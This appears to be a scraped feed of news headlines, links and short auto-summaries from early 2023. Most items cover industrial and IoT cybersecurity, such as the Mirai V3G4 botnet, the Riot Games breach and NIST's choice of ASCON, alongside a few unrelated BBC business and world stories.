ranking in H2. Percentage of ICS computers on which malicious objects from different sources were blocked, Q1 – Q4 2022 Percentage of ICS computers on which malicious objects from email were blocked, January – December 2022 There was also a noticeable increase in Q2 2022 in the percentage of ICS computers on which threats were blocked in network folders.This group includes Windows computers that perform one or several of the following functions: Supervisory control and data acquisition (SCADA) servers; Data storage servers (Historian); Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human Machine Interface (HMI); Computers used for industrial network administration; Computers used to develop software for industrial automation.Percentage of ICS computers on which malicious objects were blocked, January – December of 2021 and 2022 The increase in the percentage of ICS computers in Russia on which malicious objects were blocked in H2 2022 was due to a sharp increase of 11.1 p.p. in the percentage of ICS computers on which malicious scripts and phishing pages were blocked.Percentage of ICS computers on which denylisted internet resources, as well as malicious scripts and phishing pages were blocked, January – December 2022 The sudden surge in the percentage of ICS computers on which malicious scripts and phishing pages were blocked in August and September 2022, as well as the high figures in the following months, were due to mass infections of websites (including those of industrial organizations) that use the Bitrix CMS.Percentage of ICS computers on which malicious objects from different sources were blocked In H2 2022 in Russia, most industries saw an increase (in some cases, quite significant) in the percentage of ICS computers on which malicious objects were blocked – both as a consequence of mass distribution of malicious scripts and due to a relatively small increase in the percentage of ICS computers in Russia on which spyware was blocked. "

    ---

    Resecurity appoints Akash Rosen to lead digital forensics practice

    industry
    2023-03-06 https://www.helpnetsecurity.com/2023/03/07/resecurity-akash-rosen/
    

    Resecurity accelerates Digital Forensics & Incident Response Services portfolio with the newly appointed industry professional, Akash Rosen. Akash Rosen is a recognized digital forensics expert and investigator. He assisted international law enforcement on numerous cases related to online-banking theft, financial and healthcare fraud, money laundering, malicious code distribution, and network intrusions into enterprise and government networks. Mr. Rosen is an expert court witness and have testified on numerous digital forensics and cybercrime investigation matters. He … More →

    The post Resecurity appoints Akash Rosen to lead digital forensics practice appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

    industry
    2023-03-03 https://thehackernews.com/2023/03/new-flaws-in-tpm-20-library-pose-threat.html
    A pair of serious security defects has been disclosed in the Trusted Platform Module (TPM) 2.0 reference library specification that could potentially lead to information disclosure or privilege escalation. One of the vulnerabilities, CVE-2023-1017, concerns an out-of-bounds write, while the other, CVE-2023-1018, is described as an out-of-bounds read. Credited with discovering and reporting the "

    Autosummary: "

    ---

    SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

    exploits industry
    2023-03-02 https://thehackernews.com/2023/03/sysupdate-malware-strikes-again-with.html
    The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said "

    Autosummary: Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate, HyperBro, PlugX, and a Linux backdoor dubbed rshell. "

    ---

    Covert cyberattacks on the rise as attackers shift tactics for maximum impact

    industry ciber
    2023-03-01 https://www.helpnetsecurity.com/2023/03/01/shifting-attack-strategies/
    

    2022 was the second-highest year on record for global ransomware attempts, as well as an 87% increase in IoT malware and a record number of cryptojacking attacks (139.3 million), according to SonicWall. “The past year reinforced the need for cybersecurity in every industry and every facet of business, as threat actors targeted anything and everything, from education to retail to finance,” said SonicWall President and CEO Bob VanKirk. “While organizations face an increasing number of … More →

    The post Covert cyberattacks on the rise as attackers shift tactics for maximum impact appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Tesla to build new factory in Mexico

    latam industry
    2023-02-28 https://www.bbc.co.uk/news/business-64803467?at_medium=RSS&at_campaign=KARANGA
    Elon Musk"s electric car company joins other firms investing south of the US border. "

    Autosummary: "

    ---

    Are your IoT devices at risk? Cybersecurity concerns for 2023

    industry ciber
    2023-02-22 https://www.helpnetsecurity.com/2023/02/22/iot-devices-cybersecurity-risk-2023-video/
    

    In this Help Net Security video, J.R. Cunningham, CSO at Nuspire, discusses IoT cybersecurity concerns for 2023. With homes becoming increasingly connected and reliant on smart technology, the potential for cybercriminals to exploit vulnerabilities and wreak havoc is higher than ever before. Although we have new and emerging standards for how connected things talk to each other, such as the Matter standard that IoT companies have agreed to adopt, this could be the year we … More →

    The post Are your IoT devices at risk? Cybersecurity concerns for 2023 appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Scott Lundgren and John Spiliotis join NetSPI Board of Directors

    industry
    2023-02-22 https://www.helpnetsecurity.com/2023/02/23/netspi-board-of-directors/
    

    NetSPI has appointed Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will support the company’s next stage of growth following a year of record momentum. “We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the … More →

    The post Scott Lundgren and John Spiliotis join NetSPI Board of Directors appeared first on Help Net Security.

    "

    Autosummary: “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale,” Shilts added. "

    ---

    The Future of Network Security: Predictive Analytics and ML-Driven Solutions

    industry
    2023-02-21 https://thehackernews.com/2023/02/the-future-of-network-security.html
    As the digital age evolves and continues to shape the business landscape, corporate networks have become increasingly complex and distributed. The amount of data a company collects to detect malicious behaviour constantly increases, making it challenging to detect deceptive and unknown attack patterns and the so-called "needle in the haystack". With a growing number of cybersecurity threats, "

    Autosummary: The truth is ML-powered security solutions are bringing about a significant transformation in network security by providing security teams with numerous benefits and enhancing the overall threat detection capabilities of organizations: Big data analytics :With the ever-increasing amount of data and different log sources, organisations must be able to process vast amounts of information in real-time, including network traffic logs, endpoints, and other sources of information related to cyber threats. The Role of ML-Driven Network Security Solutions ML-driven network security solutions in cybersecurity refer to the use of self-learning algorithms and other predictive technologies (statistics, time analysis, correlations etc.) to automate various aspects of threat detection. :With the ever-increasing amount of data and different log sources, organisations must be able to process vast amounts of information in real-time, including network traffic logs, endpoints, and other sources of information related to cyber threats. "

    ---

    Alteryx Analytics Cloud platform updates boost decision intelligence

    industry
    2023-02-19 https://www.helpnetsecurity.com/2023/02/19/alteryx-platform/
    

    Alteryx has unveiled new self-service and enterprise-grade capabilities to its Alteryx Analytics Cloud Platform to help customers make faster and more intelligent decisions. The enhanced platform, which now includes all access for Designer Cloud, offers an approachable easy-to-use drag-and-drop modern interface accessible to employees of all skill levels, without compromising data governance or security standards. “We are excited about the release of the Alteryx Designer product for the cloud and the ability to make analytics … More →

    The post Alteryx Analytics Cloud platform updates boost decision intelligence appeared first on Help Net Security.

    "

    Autosummary: With two-thirds of survey respondents indicating they would benefit from an easy and approachable cloud analytics interface, new Alteryx Analytics Cloud updates include: The reimagined Designer Cloud interface is now available in All Access, with more than 30 extended prep, blend, analysis, and automation tools for intelligent decision making. "

    ---

    XIoT vendors get serious about security, devote resources to protect cyber-physical systems

    industry
    2023-02-17 https://www.helpnetsecurity.com/2023/02/17/xiot-protect-cyber-physical-systems/
    

    Cyber-physical system vulnerabilities disclosed in the second half (2H) of 2022 have declined by 14% since hitting a peak during 2H 2021, while vulnerabilities found by internal research and product security teams have increased by 80% over the same time period, according to Claroty. Strengthening cyber-physical systems These findings indicate that security researchers are having a positive impact on strengthening the security of the Extended Internet of Things (XIoT), a vast network of cyber-physical systems … More →

    The post XIoT vendors get serious about security, devote resources to protect cyber-physical systems appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    New Mirai Botnet Variant "V3G4" Exploiting 13 Flaws to Target Linux and IoT Devices

    exploits industry
    2023-02-17 https://thehackernews.com/2023/02/new-mirai-botnet-variant-v3g4.html
    A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they "

    Autosummary: "

    ---

    Researchers Warn of Critical Security Bugs in Schneider Electric Modicon PLCs

    exploits industry
    2023-02-16 https://thehackernews.com/2023/02/researchers-warn-of-critical-security.html
    Security researchers have disclosed two new vulnerabilities affecting Schneider Electric Modicon programmable logic controllers (PLCs) that could allow for authentication bypass and remote code execution. The flaws, tracked as CVE-2022-45788 (CVSS score: 7.5) and CVE-2022-45789 (CVSS score: 8.1), are part of a broader collection of security defects tracked by Forescout as OT:ICEFALL. Successful "

    Autosummary: "

    ---

    Mirai V3G4 botnet exploits 13 flaws to target IoT devices

    exploits industry
    2023-02-16 https://securityaffairs.com/142358/malware/mirai-v3g4-botnet.html
    

    During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws. Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws to infect IoT devices from July to December 2022.  Below is the list […]

    The post Mirai V3G4 botnet exploits 13 flaws to target IoT devices appeared first on Security Affairs.

    "

    Autosummary: The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9) The malware shell script downloaders are almost identical between the three campaigns The botnet client samples use the same XOR decryption key The botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates) The botnet client samples use almost identical functions The botnet exploited 13 vulnerabilities to achieve remote code execution on vulnerable devices. "

    ---

    Enigma info-stealing malware targets the cryptocurrency industry

    exploits industry
    2023-02-14 https://securityaffairs.com/142187/cyber-crime/enigma-info-stealer-cryptocurrency-industry.html
    

    Alleged Russian threat actors have been targeting cryptocurrency users in Eastern Europe with Enigma info-stealing malware. A malware campaign conducted by alleged Russian threat actors has been targeting users in Eastern European in the crypto industry. The attackers are sending out emails with fake job opportunities as bait in an attempt to trick victims into […]

    The post Enigma info-stealing malware targets the cryptocurrency industry appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Enigma) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Upon opening the Microsoft Word document, the first-stage Enigma loader is launched, which, in turn, downloads and executes an obfuscated secondary-stage payload through Telegram. "

    ---

    Honeypot-Factory: The Use of Deception in ICS/OT Environments

    industry
    2023-02-13 https://thehackernews.com/2023/02/honeypot-factory-use-of-deception-in.html
    There have been a number of reports of attacks on industrial control systems (ICS) in the past few years. Looking a bit closer, most of the attacks seem to have spilt over from traditional IT. That"s to be expected, as production systems are commonly connected to ordinary corporate networks at this point. Though our data does not indicate at this point that a lot of threat actors specifically "

    Autosummary: For instance, ICS honeypots like Conpot, XPOT, and CryPLH can simulate the Modbus, S7, IEC-104, DNP3 and other protocols. Conpot is a low-interactive honeypot that can simulate the IEC104, Modbus, BACnet, HTTP, and other protocols, which can be easily deployed and configured. is a low-interactive honeypot that can simulate the IEC104, Modbus, BACnet, HTTP, and other protocols, which can be easily deployed and configured. With the development of cybersecurity technology, deception has been applied in various circumstances like the web, databases, mobile apps, and IoT. Deception technology has been embodied in some ICS honeypot applications in the OT field. With some deception applications, for instance honeypots, the operating environment and configuration can be simulated, thus luring the attacker to penetrate the fake target. "

    ---

    Vulnerabilities open Korenix JetWave industrial networking devices to attack

    industry
    2023-02-13 https://www.helpnetsecurity.com/2023/02/13/korenix-jetwave-industrial-vulnerabilities/
    

    Three vulnerabilities found in a variety of Korenix JetWave industrial access points and LTE cellular gateways may allow attackers to either disrupt their operation or to use them as a foothold for further attacks, CyberDanube researchers have found. “If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker,” the researchers noted. … More →

    The post Vulnerabilities open Korenix JetWave industrial networking devices to attack appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    CISA issues alert with South Korean government about DPRK"s ransomware antics

    exploits government ransomware industry
    2023-02-13 https://www.malwarebytes.com/blog/news/2023/02/cisa-issues-alert-with-south-korean-government-about-dprks-ransomware-antics
    

    Categories: News Categories: Ransomware Tags: CISA Tags: ransomware Tags: Democratic People’s Republic of Korea Tags: DPRK Tags: North Korea Tags: WannaCry Tags: EternalBlue Tags: Lazarus Group Tags: APT Tags: Magniber Tags: Magnitude exploit kit Tags: exploit kit Tags: EK Tags: Andariel Tags: Silent Chollima Tags: Stonefly Tags: Maui Tags: H0lyGh0st Tags: PLUTONIUM Tags: Conti The tactics of North Korean-sponsored ransomware cyberattacks against the healthcare sector and other vital infrastructure are highlighted in the latest #StopRansomware alert. (Read more...)

    The post CISA issues alert with South Korean government about DPRK"s ransomware antics appeared first on Malwarebytes Labs.

    "

    Autosummary: " DPRK ransomware has significantly altered the face of ransomware, tuning it up from a simple locker and then making it more disruptive, lucrative, and, in some cases, destructive. H0lyGh0st, like other current ransomware gangs, favors double-extortion tactics, maintains a leak site, and targets small and medium-sized enterprises (SMEs).Once it arrives on target networks, it encrypts servers responsible for record-keeping, diagnosing, imaging services, and others. "North Korea"s cyber program poses a growing espionage, theft, and attack threat," the Annual Threat Assessment report in 2021 said. "

    ---

    Socure joins FIDO Alliance to improve identity verification industry standards

    industry
    2023-02-10 https://www.helpnetsecurity.com/2023/02/10/socure-fido-alliance/
    

    Socure has joined the FIDO (Fast IDentity Online) Alliance to advance identity verification standards that make it easy to verify identity online and protect against identity fraud across industries. Socure’s mission is to verify 100% of good identities in real-time and completely eliminate identity fraud for every applicant on the internet. Its graph-defined platform combines advanced machine learning and artificial intelligence with all elements of a consumer’s identity to deliver the most accurate and robust … More →

    The post Socure joins FIDO Alliance to improve identity verification industry standards appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Opscura raises $9.4 million to address industrial cybersecurity challenges

    industry ciber
    2023-02-09 https://www.helpnetsecurity.com/2023/02/09/opscura-funding/
    

    Opscura has received $9.4M in Series A funding as it scales to engage further U.S. partners and customers seeking to protect and connect their critical operations. Founded in Spain as Enigmedia, the new global entity Opscura is also launching a new brand, global management team, and product upgrades in addition to the capital infusion led by Anzu Partners, with investments from Dreamit and Mundi Ventures. Opscura’s technology adds a layer to the industrial cybersecurity ecosystem … More →

    The post Opscura raises $9.4 million to address industrial cybersecurity challenges appeared first on Help Net Security.

    "

    Autosummary: Customers across various industries, including renewable energy, transportation, manufacturing, government, and chemical also rely on Opscura to solve industrial cybersecurity, compliance, and digital transformation challenges. "

    ---

    Inadequate cybersecurity investments leave rail industry at risk

    industry ciber
    2023-02-09 https://www.helpnetsecurity.com/2023/02/09/rail-industry-cybersecurity-spending/
    

    The popular notion might view the rail industry as a laggard compared to auto or high-tech manufacturing when embracing Industry 4.0. Yet railways are increasingly dependent on sophisticated connected systems to enhance efficiency and customer satisfaction. Rail industry needs to work closely with cybersecurity vendors With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding … More →

    The post Inadequate cybersecurity investments leave rail industry at risk appeared first on Help Net Security.

    "

    Autosummary: Rail industry needs to work closely with cybersecurity vendors With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding to become an integral component of safety, providing new market opportunities in the rail, freight, and transit sector. "

    ---

    NIST chooses encryption algorithms for lightweight IoT devices

    industry
    2023-02-09 https://www.helpnetsecurity.com/2023/02/09/encryption-algorithms-iot/
    

    ASCON is the name of the group of lightweight authenticated encryption and hashing algorithms that the U.S. National Institute of Standards and Technology (NIST) has chosen to secure the data generated by Internet of Things (IoT) devices: implanted medical devices, keyless entry fobs, “smart home” devices, etc. Gathered under the ASCON label are seven algorithms, some of which may not end up being included in the lightweight cryptography standard NIST is plans to publish later … More →

    The post NIST chooses encryption algorithms for lightweight IoT devices appeared first on Help Net Security.

    "

    Autosummary: ASCON, developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research and Radboud University, has now been chosen as the winner of the contest, due to its many qualities, which include speed, ease of implementation, energy efficiency, and scalability. "

    ---

    Gootkit Malware Adopts New Tactics to Attack Healthcare and Finance Firms

    financial exploits industry
    2023-02-09 https://thehackernews.com/2023/02/gootkit-malware-adopts-new-tactics-to.html
    The Gootkit malware is prominently going after healthcare and finance organizations in the U.S., U.K., and Australia, according to new findings from Cybereason. The cybersecurity firm said it investigated a Gootkit incident in December 2022 that adopted a new method of deployment, with the actors abusing the foothold to deliver Cobalt Strike and SystemBC for post-exploitation. "The threat actor "

    Autosummary: "

    ---

    Critical Infrastructure at Risk from New Vulnerabilities Found in Wireless IIoT Devices

    industry
    2023-02-09 https://thehackernews.com/2023/02/critical-infrastructure-at-risk-from.html
    A set of 38 security vulnerabilities has been uncovered in wireless industrial internet of things (IIoT) devices from four different vendors that could pose a significant attack surface for threat actors looking to exploit operational technology (OT) environments. "Threat actors can exploit vulnerabilities in Wireless IIoT devices to gain initial access to internal OT networks," Israeli "

    Autosummary: Alternatively, local attackers can break into industrial Wi-Fi access points and cellular gateways by targeting on-site Wi-Fi or cellular channels, leading to adversary-in-the-middle (AitM) scenarios with adverse potential impact. "

    ---

    NIST Standardizes Ascon Cryptographic Algorithm for IoT and Other Lightweight Devices

    industry
    2023-02-08 https://thehackernews.com/2023/02/nist-standardizes-ascon-cryptographic.html
    The U.S. National Institute of Standards and Technology (NIST) has announced that a family of authenticated encryption and hashing algorithms known as Ascon will be standardized for lightweight cryptography applications. "The chosen algorithms are designed to protect information created and transmitted by the Internet of Things (IoT), including its myriad tiny sensors and actuators," NIST said. "

    Autosummary: "

    ---

    US NIST unveils winning encryption algorithm for IoT data protection

    industry
    2023-02-08 https://www.bleepingcomputer.com/news/security/us-nist-unveils-winning-encryption-algorithm-for-iot-data-protection/
    The National Institute of Standards and Technology (NIST) announced that ASCON is the winning bid for the "lightweight cryptography" program to find the best algorithm to protect small IoT (Internet of Things) devices with limited hardware resources. [...] "

    Autosummary: NIST also considered that the algorithm had withstood the test of time, having been developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research, and Radboud University, and winning the CAESAR cryptographic competition"s "lightweight encryption" category in 2019. "

    ---

    Industrial Defender and Nozomi Networks partner to protect critical operational technology

    industry
    2023-02-07 https://www.helpnetsecurity.com/2023/02/07/industrial-defender-nozomi-networks/
    

    Nozomi Networks and Industrial Defender have unveiled a strategic partnership to enhance the security of critical infrastructure and manufacturing facilities. The companies’ joint solution combines asset visibility and threat detection capabilities from Nozomi Networks with change and configuration monitoring from Industrial Defender to provide the most complete and detailed view of OT assets and behavior in the industry. “Collaborating with industry leaders is essential for effectively defending against the growing cyber threats against operational technology. … More →

    The post Industrial Defender and Nozomi Networks partner to protect critical operational technology appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    India-China relations will define the IoT landscape in 2023

    industry
    2023-02-07 https://www.helpnetsecurity.com/2023/02/07/iot-landscape-2023/
    

    Tensions between two of the biggest producers of connected (IoT) devices are coming to a head, and will be changing the IoT landscape in 2023. In recent months, India and China have faced off over their disputed border in the Himalayas. The military stand-off mirrors growing tech conflict between the two superpowers. In a relationship increasingly marked by diplomatic disputes and trade rivalry, India and China are now competing for the Internet of Things (IoT). … More →

    The post India-China relations will define the IoT landscape in 2023 appeared first on Help Net Security.

    "

    Autosummary: In my view, the country is only set to grow in IoT. They are more democratic, count fewer language barriers and have a young, tech-savvy populace – the perfect conditions for economic golden years.At a minimum, devices must count encrypted, direct communications, and cybersecurity leaders should review device origin in any onboarding process.China, on the other hand, is coming out of the pandemic and keen to continue its tech bull run, so we cannot expect them to go down without a fight. "

    ---

    GuLoader Malware Using Malicious NSIS Executable to Target E-Commerce Industry

    exploits industry
    2023-02-06 https://thehackernews.com/2023/02/guloader-malware-using-malicious-nsis.html
    E-commerce industries in South Korea and the U.S. are at the receiving end of an ongoing GuLoader malware campaign, cybersecurity firm Trellix disclosed late last month. The malspam activity is notable for transitioning away from malware-laced Microsoft Word documents to NSIS executable files for loading the malware. Other countries targeted as part of the campaign include Germany, Saudi Arabia, "

    Autosummary: "

    ---

    Experts Warn of "Ice Breaker" Cyberattacks Targeting Gaming and Gambling Industry

    industry ciber
    2023-02-01 https://thehackernews.com/2023/02/experts-warn-of-ice-breaker.html
    A new attack campaign has targeted the gaming and gambling sectors since at least September 2022, just months prior to the ICE London 2023 gaming industry trade fair event that"s scheduled next week. Israeli cybersecurity company Security Joes is tracking the activity cluster under the name Ice Breaker, stating the intrusions employ clever social engineering tactics to deploy a JavaScript "

    Autosummary: "

    ---

    Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076)

    exploits industry
    2023-02-01 https://www.helpnetsecurity.com/2023/02/01/cve-2023-20076/
    

    Cisco has released patches for a high-severity vulnerability (CVE-2023-20076) found in some of its industrial routers, gateways and enterprise wireless access points, which may allow attackers to insert malicious code that can’t be deleted by simply rebooting the device or updating its firmware. “In this case, the command injection bypasses mitigations Cisco has in place to ensure vulnerabilities do not persist in a system. Side-stepping this security measure means that if an attacker exploits this … More →

    The post Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076) appeared first on Help Net Security.

    "

    Autosummary: IOS XE-based devices configured with IOx (i.e., routers capable of running third-party apps inside of a containerized environment Cisco Catalyst Access points (wireless access point for enterprise environments with a high number of connected devices) IR510 WPAN Industrial Routers (wireless routers smart factories and smart grids) CGR1000 Compute Modules (for enterprise cloud services) There are no workarounds available. "

    ---

    New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector

    exploits industry
    2023-01-31 https://thehackernews.com/2023/01/new-report-reveals-nikowiper-malware.html
    The Russia-affiliated Sandworm used yet another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine. "The NikoWiper is based on SDelete, a command line utility from Microsoft that is used for securely deleting files," cybersecurity company ESET revealed in its latest APT Activity Report shared with The Hacker "

    Autosummary: "Any country with a nexus to the Ukraine crisis, particularly those with key geopolitical, economic, or military relationships with Russia or Ukraine, are at increased risk of targeting," the company said in a technical report published last week. "

    ---

    ICS vulnerabilities: Insights from advisories, how CVEs are reported

    industry
    2023-01-30 https://www.helpnetsecurity.com/2023/01/30/ics-vulnerabilities-advisories-cve-video/
    

    SynSaber recently released its second Industrial Control Systems (ICS) Vulnerabilities & CVEs Report. In this Help Net Security video, Ronnie Fabela, CTO at SynSaber, talks about the key findings: For the CVEs reported in the second half of 2022, 35% have no patch or remediation currently available from the vendor (up from 13% in the first half of the year) While 56% of the CVEs have been reported by the Original Equipment Manufacturer (OEM), 43% … More →

    The post ICS vulnerabilities: Insights from advisories, how CVEs are reported appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Realtek Vulnerability Under Attack: 134 Million Attempts in 2 Months to Hack IoT Devices

    exploits industry
    2023-01-30 https://thehackernews.com/2023/01/realtek-vulnerability-under-attack-134.html
    Researchers are warning about a spike in exploitation attempts weaponizing a critical remote code execution flaw in Realtek Jungle SDK since the start of August 2022. According to Palo Alto Networks Unit 42, the ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months. Close to 50% of the attacks "

    Autosummary: "

    ---

    Riot Games refuses to pay ransom to avoid League of Legends leak

    industry
    2023-01-30 https://www.malwarebytes.com/blog/news/2023/01/stolen-code-from-riot-games-already-being-auctioned-off
    

    Categories: News Tags: Riot Games Tags: 2K Games Tags: Rockstar Games Tags: social engineering Tags: phishing The Riot Games breach saga continues. (Read more...)

    The post Riot Games refuses to pay ransom to avoid League of Legends leak appeared first on Malwarebytes Labs.

    "

    Autosummary: Motherboard was able to obtain a copy of the ransom email and partially shared the content with its readers, which we have replicated below: Dear Riot Games, We have obtained your valuable data, including the precious anti-cheat source code and the entire game code for League of Legends and its tools, as well as Packman, your usermode anti-cheat. "

    ---

    Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached

    industry ciber
    2023-01-29 https://www.helpnetsecurity.com/2023/01/29/week-in-review-chatgpt-cybersecurity-critical-rce-vulnerabilities-found-in-git-riot-games-breached/
    

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: BSidesZG 2023: Strengthening the infosec community in Croatia’s capital In March 2023, Zagreb will be added to the (already long) list of cities where information security professionals and enthusiasts can share their knowledge with peers at a Security BSides conference. We’ve talked with BSidesZG organizer Ante Jurjevic to find out what’s in store for those who attend. How to tackle … More →

    The post Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached appeared first on Help Net Security.

    "

    Autosummary: Critical VMware vRealize Log Insight flaws patched (CVE-2022-31706, CVE-2022-31704) VMware has fixed two critical (CVE-2022-31706, CVE-2022-31704) and two important (CVE-2022-31710, CVE-2022-31711) security vulnerabilities in VMware vRealize Log Insight, its multi-cloud solution for centralized log management, operational visibility and intelligent analytics. Why most IoT cybersecurity strategies give zero hope for zero trust In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT. Understanding your attack surface makes it easier to prioritize technologies and systems Organizations need to strike the balance of carrying out enough due diligence before patching, and then patching as quickly as possible to defend themselves against emerging threats. "

    ---

    Hemp makes a comeback in the construction industry

    industry
    2023-01-27 https://www.bbc.co.uk/news/business-63666195?at_medium=RSS&at_campaign=KARANGA
    A revival of hemp cultivation in Portugal has spurred the use of hemp blocks in construction. "

    Autosummary: "

    ---

    BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer

    exploits ransomware industry
    2023-01-27 https://securityaffairs.com/141409/data-breach/blackcat-ransomware-solar-industries-india.html
    

    The BlackCat Ransomware group claims to have hacked SOLAR INDUSTRIES INDIA and to have stolen 2TB of “secret military data.” The BlackCat Ransomware gang added SOLAR INDUSTRIES INDIA to the list of victims published on its Tor leak site. The company is a globally recognised industrial explosives manufacturer, it provides complete blasting solutions, including packaged, […]

    The post BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Haiti police riot on streets after gang attacks on officers

    industry
    2023-01-27 https://www.bbc.co.uk/news/world-latin-america-64424601?at_medium=RSS&at_campaign=KARANGA
    The protesters blame the government for not taking action over a number of gang attacks on police stations and officers. "

    Autosummary: "

    ---

    Haiti police riot after crime gangs kill 14 officers

    industry
    2023-01-26 https://www.bbc.co.uk/news/world-latin-america-64421308?at_medium=RSS&at_campaign=KARANGA
    Fourteen police officers have died since the start of 2023 amid a huge surge in gang violence. "

    Autosummary: "

    ---

    Riot Games breached: How did it happen?

    industry
    2023-01-25 https://www.helpnetsecurity.com/2023/01/25/riot-games-breached/
    

    The hackers who breached Riot Games last week are asking for $10 million not to leak the stolen source code for the company’s popular League of Legends online game. The company has also confirmed that source code for TFT (Teamfight Tactics) and a legacy anti-cheat platform (Packman) were exfiltrated by the attackers, but said they won’t be paying the ransom. It all started with social engineering Last week, Riot Games said that systems in their … More →

    The post Riot Games breached: How did it happen? appeared first on Help Net Security.

    "

    Autosummary: The operator of malware repository vx-underground has professedly spoken to the attacker, who said they got in by social engineering a Riot Games employee via SMS, that they managed to pivot through the company network and escalate privileges by social engineering a company director, but that they did not deploy malware (e.g., ransomware) on company systems. "

    ---

    Riot Games receives ransom demand from hackers, refuses to pay

    industry
    2023-01-24 https://www.bleepingcomputer.com/news/security/riot-games-receives-ransom-demand-from-hackers-refuses-to-pay/
    Riot Games says it will not pay the ransom demanded by the attackers responsible for the security breach the company disclosed last week. [...] "

    Autosummary: Lapsus$ is known for hacking into the network of a series of high-profile companies, including Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "

    ---

    Riot Games compromised, new releases and patches halted

    industry
    2023-01-24 https://www.malwarebytes.com/blog/news/2023/01/riot-games-reveals-compromise-of-development-environment
    

    Categories: News Tags: Riot Games Tags: valorant Tags: league of legends Tags: compromise Tags: development Tags: patch Tags: patching Tags: update Riot Games has revealed that it has been compromised after a social engineering attack. (Read more...)

    The post Riot Games compromised, new releases and patches halted appeared first on Malwarebytes Labs.

    "

    Autosummary: For now Riot, stewards of titles such as Valorant and League of Legends, made the following statement in relation to the attack: Earlier this week, systems in our development environment were compromised via a social engineering attack. "

    ---

    Why most IoT cybersecurity strategies give zero hope for zero trust

    industry ciber
    2023-01-23 https://www.helpnetsecurity.com/2023/01/23/iot-cybersecurity-strategies-zero-trust-video/
    

    IoT remains the biggest hurdle in achieving an effective zero-trust security posture across an organization. In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT.

    The post Why most IoT cybersecurity strategies give zero hope for zero trust appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Video game firm Riot Games hacked, now it faces problems to release content

    industry
    2023-01-23 https://securityaffairs.com/141171/cyber-crime/riot-games-hacked.html
    

    Video game developer and publisher Riot Games announced that it will delay the release of game patches after a security incident. Riot Games is an American video game developer, publisher and esports tournament organizer known for the creation of the popular games League of Legends and Valorant. Last week threat actors hacked the company’s systems in its development environment, Riot Games […]

    The post Video game firm Riot Games hacked, now it faces problems to release content appeared first on Security Affairs.

    "

    Autosummary: [adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, gaming) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Riot Games hacked, delays game patches after security breach

    industry
    2023-01-21 https://www.bleepingcomputer.com/news/security/riot-games-hacked-delays-game-patches-after-security-breach/
    Riot Games, the video game developer and publisher behind League of Legends and Valorant, says it will delay game patches after its development environment was compromised. [...] "

    Autosummary: " "This issue may impact our ability to release the full scope of balance changes planned, but we"re working to implement the most meaningful of those possible through a hotfix at our scheduled patch time," the TFT team added. "

    ---

    Brazil Congress riots: President Lula sacks army commander

    latam industry
